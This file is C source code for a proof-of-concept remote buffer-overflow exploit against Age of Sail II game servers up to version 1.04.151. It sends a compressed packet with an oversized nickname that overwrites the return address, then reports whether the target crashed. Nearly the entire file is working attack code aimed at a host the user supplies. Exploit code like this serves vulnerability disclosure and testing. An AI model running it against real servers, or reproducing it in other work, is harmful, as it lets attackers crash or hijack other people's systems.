/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <zlib.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    7732
#define BUFFSZ  2048
#define NICKSZ  144
#define RET     0xdeadc0de
#define TIMEOUT 3



int zip_it(u_char *in, int size, u_char *out, int maxsz);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct      sockaddr_in peer;
    int         sd,
                len;
    u_short     port = PORT;
    u_char      buff[BUFFSZ],
                pck[BUFFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Age of Sail II <= 1.04.151 server buffer overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n"
            " Return address will be overwritten with 0x%08x\n"
            "\n", argv[0], port, RET);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("\n"
        "- connect to %s:%hu...",
        inet_ntoa(peer.sin_addr), port);
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    fputs("ok\n\n", stdout);

    memset(pck, 0, BUFFSZ);                      // needed
    *(u_short *)(pck + 4) = 2;                      // dunno (?)
    *(u_short *)(pck + 6) = NICKSZ;                 // nickname size
    memset(pck + 8, 'a', NICKSZ);                   // nickname
    *(u_int *)(pck + 8 + NICKSZ - 4) = RET;        // return address
    *(u_int *)(pck + NICKSZ + 44) = 0xffffffff;    // dunno (?)
    *(u_int *)(pck + NICKSZ + 50) = 0x02060123;    // client version
    len = 8 + NICKSZ + 36 + 6 + 4;
    *(u_short *)(pck + 2) = len - 4;                // size - 4

    len = zip_it(pck, len, buff + 4, BUFFSZ - 4) + 4;
    *(u_int *)buff = len;
    printf("- send buffer-overflow data, return address will be overwritten with 0x%08x\n", RET);
    if(send(sd, buff, len, 0)
      < 0) std_err();

    fputs("- check if server is vulnerable:\n", stdout);
    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) <= 0)) {
        fputs("\nServer IS vulnerable!!!!!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }

    close(sd);

    return(0);
}



int zip_it(u_char *in, int size, u_char *out, int maxsz) {
    z_stream        z;
    int             ret;

    z.zalloc = (alloc_func)0;
    z.zfree  = (free_func)0;
    z.opaque = (voidpf)0;

    if(deflateInit(&z, Z_BEST_COMPRESSION)) {
        fputs("\nError: zlib initialization error\n", stdout);
        exit(1);
    }

    z.next_in   = in;
    z.avail_in  = size;
    z.next_out  = out;
    z.avail_out = maxsz;
    deflate(&z, Z_FINISH);

    ret = z.total_out;
    deflateEnd(&z);
    return(ret);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


